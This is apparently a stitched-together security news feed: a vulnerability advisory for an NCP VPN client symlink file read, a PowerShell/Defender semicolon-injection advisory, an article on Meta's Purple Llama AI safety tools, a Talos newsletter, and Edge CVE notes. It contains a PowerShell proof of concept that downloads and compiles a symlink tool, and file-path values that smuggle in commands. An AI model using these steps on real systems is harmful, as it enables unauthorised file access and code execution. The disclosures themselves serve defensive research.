Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers read the contents of arbitrary files on the operating system by creating a symbolic link.

**usd-2022-0003 | NCP Secure Enterprise Client - Arbitrary File Read**

**Advisory ID:** usd-2022-0003  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Arbitrary File Read  
**Security Risk:** High  
**Vendor URL:** https//www.ncp-e.com/  
**Vendor Status:** Fixed

**Introduction**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. After the corresponding information was collected, users can inspect the contents of the collected  
files within the graphical user interface of the _NCP_ application. Despite the graphical user interface runs with the permissions of the  
current user, inspecting a diagnostic file causes a high privileged service to read the contents of it. After reading, the contents are send to  
the graphical user interface of the _NCP_ application and displayed to the invoking user.

After the _Support Assistant_ has collected the diagnostic files, they are stored within the directory __C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*_.  
This is also the directory where the high privileged service obtains the file contents from when files are inspected within the graphical  
user interface. Since the directory is fully user controlled, low privileged users can use a_ symbolic link\* to redirect the read operation to  
an arbitrary target.

**Proof of Concept**

The first step is to start the _Support Assistant_ within the tray icon of the _NCP Secure Enterprise_ client. The corresponding function  
can be found in the upper right of the graphical user interface under the _Help_ menu. After the _Support Assistant_ has collected the  
diagnostic information, the corresponding files are displayed within the graphical user interface:

Now it is possible to replace one of the files with a _symbolic link_ to an arbitrary target. In the following listing we replace the  
file **C:\\Users\\\\AppData\\Local\\Temp\\NCPSupport\\services.txt** with a _symbolic link_ pointing to **C:\\Windows\\CCM\\CcmEval.xml**.  
Moreover, we demonstrate that the target file is not readable for a low privileged user account:

PS C:\\> type C:\\Windows\\CCM\\CcmEval.xml  
type : Der Zugriff auf den Pfad "C:\\Windows\\CCM\\CcmEval.xml" wurde verweigert.  
In Zeile:1 Zeichen:1  
+ type C:\\Windows\\CCM\\CcmEval.xml  
+ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    + CategoryInfo          : PermissionDenied: (C:\\Windows\\CCM\\CcmEval.xml:String) \[Get-Content\], UnauthorizedAccessException    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommandPS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> $s \= New-Object de.usd.SharpLink.Symlink("C:\\Users\\<USER>\\AppData\\Local\\Temp\\NCPSupport\\services.txt", "C:\\Windows\\CCM\\CcmEval.xml")  
PS C:\\> $s.Open()  
\[+\] Creating Junction: C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport \-> \\RPC CONTROL  
\[+\] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\services.txt \-> \\??\\C:\\Windows\\CCM\\CcmEval.xml  
\[+\] Symlink setup successfully.

Now it is time to inspect the file **services.txt** within the _Support Assistant_ graphical user interface.  
Clicking the corresponding file twice shows the contents of the targeted file:

**Fix**

It is not evident why a high privileged service is used to display the obtained diagnostic information. The read operation  
should be performed by the low privileged process instead, which also draws the graphical user interface.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   **2022-02-02** First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28869: Security Advisory usd-2022-0003 | usd HeroLab

Microsoft Defender API and PowerShell APIs suffer from an arbitrary code execution due to a flaw in powershell not handling user provided input that contains a semicolon.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt[+] twitter.com/hyp3rlinx[+] x.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows PowerShell[Vulnerability Type]Arbitrary Code Execution[CVE Reference]N/A[Security Issue]Microsoft Defender Anti Malware and or PS API's can result in executing arbitrary code.E.g. scan a directory, shortcut .lnk or even non-existent item, may execute unintended code.This vector builds upon my previous advisory and subsequent project PSTrojanFile.Requirements:1) On CL 'powershell' cmd is prefixed or passed in by calling PowerShell from another script2) Executable file of same name as the parameter that lives nearbyExamples:powershell Start-MpScan -Scanpath "C:\Users\gg\Downloads\;saps Helper;.1.zip"(Helper.exe lives on Desktop)Create directory  ";saps Test", Test.exe, Test.cmd etc is on same CL pathpowershell Add-MpPreference -ControlledFolderAccessAllowedApplications ";saps Test"Create directory with semicolon, drop PE file named doom.exe in same path.powershell Set-ProcessMitigation -PolicyFilePath  "test;saps doom"TODO: Update PSTrojanFile[References]http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txthttps://github.com/hyp3rlinx/PSTrojanFilehttps://packetstormsecurity.com/files/153863/Microsoft-Windows-PowerShell-Command-Execution.htmlhttps://www.exploit-db.com/exploits/47248https://github.com/MicrosoftDocs/windows-powershell-docs/tree/main/docset/winserver2019-ps/defender[Video PoC URL]https://www.youtube.com/watch?v=0Go6yJiRWP8[Network Access]Remote [Severity]High[Disclosure Timeline]Vendor Notification:  circa (2019)December 7, 2023 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Microsoft Defender Anti-Malware PowerShell API Arbitrary Code Execution

Meta's Project Llama aims to help developers filter out specific items that might cause their AI model to produce inappropriate content.

Meta has announced Purple Llama, a project that aims to “bring together tools and evaluations to help the community build responsibly with open generative AI models.”

Generative Artificial Intelligence (AI) models have been around for years and their main function, compared to older AI models is that they can process more types of input. Take for example the older models that were used to determine whether a file was malware or not. The input is limited to files and the output usually comes in the form of a percentage. (e.g. The chance that this file is malicious is 90%. ).

Generative AI models are capable of sorting through more types of information. Take for example Large Language Models (LLMs) that can process text, images, videos, songs, diagrams, webinars, computer code, and other similar types of input.

Generative AI models are the closest to human creativity we can get at this point in time. As such, generative AI has brought about a new wave of innovations. It enables us to have a conversation with models like ChatGPT, create images based on instructions, and summarize large amounts of text(s). It can even write papers to the point where scientists have a hard time telling them apart from human work.

According to Meta’s statement:

> “Collaboration on safety will build trust in the developers driving this new wave of innovation, and requires additional research and contributions on responsible AI.”

For this reason, Meta is collaborating in project Purple Llama with other AI application developers like Microsoft and cloud platforms like AWS and Google Cloud, and chip designers like Intel, AMD, and Nvidia.

LLMs can generate code, that fails to follow security best practices or introduce exploitable vulnerabilities. Given that GitHub recently proudly touted that 46% of code is produced with the help of their CoPilot AI, this is far from just a theoretical risk.

So, it makes sense that the first step in project Purple Llama focuses on tools to test cyber security issues in software-generating models. This package allows developers to run benchmark tests to check how likely it is for an AI model to generate insecure code or assist users in carrying out cyberattacks.

The package is introduced under the name CyberSecEval, a comprehensive benchmark developed to help bolster the cybersecurity of LLMs employed as coding assistants. Initial tests showed that on average, LLMs suggested vulnerable code 30% of the time.

To check and filter all the inputs and outputs of a LLM, Meta released Llama Guard. Llama Guard is a freely available model that provides developers with a pretrained model to help defend against generating potentially risky outputs. The model has been trained on a mix of publicly available datasets to help find common types of potentially risky, or violating content. This will allow developers to filter out specific items that might cause a model to produce inappropriate content.

The announcement has come at the same time as the Cybersecurity & Infrastructure Security Agency (CISA) has published a guide setting out The case for memory safe roadmaps. In its guidance, CISA attempts to provide manufacturers with steps they can take towards creating and publishing memory safe roadmaps as part of the international Secure by Design campaign.

Memory safety vulnerabilities are a class of well-known and common coding errors that cybercriminals exploit quite often. Coding errors that could increase in numbers unless we take steps toward using memory safe programming languages and use the methods to check the code generated by LLMs.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Meta&#8217;s Purple Llama wants to test safety risks in AI models 

The Microsoft Windows Kernel has a time-of-check / time-of-use issue in verifying layered key security which may lead to information disclosure from privileged registry keys.

Windows Kernel Information Disclosure

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

CVE-2023-35618

Microsoft Edge (Chromium-based) Information Disclosure Vulnerability

CVE-2023-38174

CVE-2023-36880

When searching for holiday gifts online, make sure you’re buying from a trusted vendor, or if you haven’t heard of the vendor before, take a few extra minutes just to look them up and read their app’s privacy policy.

Thursday, December 7, 2023 14:00

As I wrote about last week, there are holiday shopping-related scams already popping up all over the place.  

But another aspect of security that many shoppers don’t consider this time of year is the security of the products they’re buying, even through a legitimate online marketplace. 

This is a glaring issue with home security cameras and Wi-Fi-connected doorbells, but I can’t imagine these are particularly popular holiday gifts. With virtually everything being connected to the internet somehow these days, everything is a potential security risk if you’re buying a new piece of technology. 

Take smartwatches, for example. Apple Watches and Samsung Galaxy watches are always popular on everyone’s wishlists this time of year because they’re high-priced items you normally wouldn’t buy for yourself. Many shoppers might be looking for a deal this time of year and not looking to spend hundreds on the gift, so any sort of cheaper alternative could be appealing. 

I searched for “smart watches” on Amazon, and the results page displayed four different watches from four different vendors as their “Top Results,” none of which were Samsung and Apple. Well-known vendors are certainly not immune to security issues or vulnerabilities, but at least users can be confident that any known vulnerabilities will be disclosed and patched by these companies as they pop up. 

The top result is for a $29.99 smartwatch that offers sleep tracking, blood pressure monitoring, dozens of different workout modes, step tracking, and more. However, there are a few security flags for me right up front with this deal (after all, if it seems too good to be true, it probably is). Amazon states the seller is a company called “Nerunsa,” but a quick search did not turn up any legitimate information on who this company is, where they’re based, or the sort of security bona fides you’d be hoping for. The only search results are for the company’s Amazon store page and a few eBay listings for people reselling the watch in question. 

The app that’s listed as supporting the watch is called “GloryFit” on the Google Play and Apple app stores, and its privacy policy is equally vague. It states that the app will collect all the suspected information for someone using a smartwatch — phone calls, text messages, GPS location, personal information, health information, etc. But, the policy states that, when the user accepts the privacy policy, “You hereby consent to our process and disclose personal information to our affiliated companies (which are in the communications, social media, technology and cloud businesses) and to Third Party Service Providers for the purposes of this Privacy Policy.” And it’s not particularly clear what those other companies do, exactly — Google was no help here, either. 

Apple Air Tags are also another popular tech gift every year and are usually featured in major retailers’ Black Friday sales. I personally have my own concerns about any type of tracking tag coming into my house, but that’s for another column. 

On Walmart, which is increasingly trying to compete with Amazon by offering more products online, I searched for “smart tag” and found three results that appeared ahead of Apple’s legitimate Air Tags. The second-most-popular result is for a “Bluetooth Tracker and Item Locator” that’s only $15.98, compared to $86.88 for a four-pack of Apple’s. This tracker is listed as being made by “AILIUTOP,” which also remains elusive on the internet and does not seem to have any sort of legitimate contact information available to the public. Their store page on Walmart indicates the seller offers many types of products, from clothing to home goods and more.  

 This seems like a good bargain as a gift for someone who is always losing their keys or wallet or wants to make sure their bicycle is secure when they lock it up somewhere. But purchasing these types of “smart” devices with so much uncertainty poses a few issues. 

If you do experience some sort of security failure or issue, there is no easy way to contact any of these vendors through the traditional means that the average user would go searching for. These vendors have no clear history of responsibly disclosing vulnerabilities, releasing security updates, or testing their products’ security before release. 

When these types of gifts are dealing with such high-profile information like your personal information, health data, or physical location, users should be confident that their information is being stored correctly and securely, or at least there’s a way to contact the vendor should they have any questions. 

When searching for holiday gifts online, make sure you’re buying from a trusted vendor, or if you haven’t heard of the vendor before, take a few extra minutes just to look them up, read their app’s privacy policy, or even read the reviews to make sure there’s no clear sign of bot activity like repetitive words or phrases or using the same photo for multiple reviews.  

**The one big thing **

The 2023 Cisco Talos Year in Review is now available to download. Once again, the Talos team has meticulously combed through a massive amount of data to analyze the major trends that have shaped the threat landscape in 2023. Global conflict influenced a lot of these trends, altering the tactics and approaches of many threat actors. In operations ranging from espionage to cybercrime, we’ve seen geopolitical events have a significant impact on the way these are carried out. 

**Why do I care? **

The Year in Review report includes new data and telemetry from Talos about attacker trends, popular malware seen in the wild, and much more. Despite the accelerated pace of many threat actor campaigns and the geopolitical events that shaped them, our report shows that the defensive community’s diligence, inventiveness and collaborative efforts are helping to push adversaries back.   

**So now what? **

Download our full report here, bookmark the Year in Review landing page for future content we have planned around the report, and listen to the Beers with Talos episode that covers the details of the report. 

**Top security headlines of the week **

**More than six million people are reportedly victims of a large data breach at DNA and genealogy testing firm 23andMe.** The breach is larger than initially expected, with more than 5.5 million users who opted into the company’s “DNA Relatives” feature, which allows customers to automatically share some of their data with other users. Another 1 million-plus users had their family tree information accessed. The attackers accessed the accounts because of password reuse from users, likely who used easy-to-guess login information or passwords they used across multiple other accounts. 23andMe was not the target of the initial breach, nor was a company account the source of the compromised credentials. Security experts are urging users to move away from traditional username-and-password login methods as these types of attacks happen more often, instead moving toward multi-factor authentication or passwordless logins. (TechCrunch, Wall Street Journal) 

**Apple released emergency fixes for two zero-day vulnerabilities in its WebKit browser engine that have already been exploited in the wild.** The company reported that the flaws are being exploited on devices running on iOS versions before iOS 16.7.1 (released on Oct. 10, 2023). There are new patches available, which users should install immediately, in iOS, iPadOS, macOS Sonoma and the Safari web browser. The two vulnerabilities tracked as CVE-2023-42916 and CVE-2023-42917, leave affected devices vulnerable to adversaries accessing sensitive information on targeted devices. CVE-2023-42917 could also allow an attacker to execute arbitrary code on the targeted machine. (SC Magazine, Decipher) 

**Security researchers say a new threat actor known as “AeroBlade” compromised a U.S. aerospace company for more than a year.** The actor reportedly started testing their malware and infection chain on the targeted network in September 2022 and executed malware on the network in July 2023. The activity sat undetected for months due to anti-analysis techniques. It is currently unknown what actions, if any, the actor carried out during that time or if they compromised any user or customer data. The initial infection began with a Microsoft Word lure document with the title, “"SOMETHING WENT WRONG Enable Content to load the document." The ensuing malicious Microsoft Word template (DOTM) file then loaded a DLL that served as a reverse shell. Researchers say the attacker’s intent was likely to steal data from the target to sell it, potentially supply it to international competitors, or use it to extort the target into paying a ransom. (Dark Reading, Bleeping Computer)  

**Can’t get enough Talos? **

Security journalists from Decipher bring you the headlines, including new U.S. government sanctions on threat actor groups in our latest Threat Spotlight video.

Then, Hazel chats to Talos security researcher Joe Marshall to discuss the Talos 2023 Year in Review, and Project PowerUp, the story of how Cisco Talos worked with a multi-national, multi-company coalition of volunteers and experts to help “keep the lights on” in Ukraine, by injecting a measure of stability in Ukraine’s power transmission grid.

**Upcoming events where you can find Talos **

**"Power of the Platform” by Cisco** **(Dec. 5 & 7)** 

Virtual (Please note: This presentation will only be given in German) 

_The annual IT event at the end of the year where Cisco experts, including Gergana Karadzhova-Dangela from Cisco Talos Incident Response, discuss the future-oriented topics in the implementation of digitalization together with you._  

**What Threats Kept Us Up in 2023: A Year in Review and a Look Ahead** **(Dec. 13, 11 a.m. PT)** 

Virtual 

_Each year brings new threats that take advantage of increasingly complex security environments. Whether it’s Volt Typhoon targeting critical infrastructure organizations across the United States or ALPHV launching an attack against casino giant MGM, threat actors are becoming bolder and more evasive. That’s why it’s never been more important to leverage broad telemetry sources, deep network insights and threat intelligence to respond effectively and recover faster from sophisticated attacks. Join Amy Henderson, Director of Strategic Planning and Communications at Cisco Talos and Briana Farro, Director of XDR Product Management at Cisco, as they discuss some of the top threat trends and threats we have seen this past year and how to leverage security technology like XDR and network insights to fight against them._ 

**NIS2 Directive: Why Organizations Must Act Now to Ensure Compliance and Security** **(Jan. 11, 2024, 10 a.m. GMT)** 

Virtual 

_The NIS2 Directive is a crucial step toward securing Europe’s critical infrastructure and essential services in an increasingly interconnected world. Organizations must act now to prepare for the new requirements, safeguard their operations, and maintain a robust cybersecurity posture. Gergana Karadzhova-Dangela from Cisco Talos Incident Response and other Cisco experts will talk about how organizations can best prepare for the coming regulations._  

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a   
**MD5:** 200206279107f4a2bb1832e3fcd7d64c   
**Typical Filename:** lsgkozfm.bat   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd 

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440   
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e   
**Typical Filename:** iizbpyilb.bat   
**Claimed Product:** N/A    
**Detection Name:** Trojan.Agent.DDOH 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7    
**MD5:** 0e4c49327e3be816022a233f844a5731    
**Typical Filename:** aact.exe    
**Claimed Product:** AAct x86    
**Detection Name:** PUA.Win.Tool.Kmsauto::in03.talos 

**SHA 256:** 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e   
**MD5:** 040cd888e971f2872d6d5dafd52e6194   
**Typical Filename:** streamer.exe   
**Claimed Product:** Ultra Virus Killer   
**Detection Name:** PUA.Win.Virus.Ultra::95.sbx.tg

Cybersecurity considerations to have when shopping for holiday gifts

**Why is this Chrome CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable.

**How can I see the version of the browser?**

1.  In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window
2.  Click on **Help and Feedback**
3.  Click on **About Microsoft Edge**

Tag

#microsoft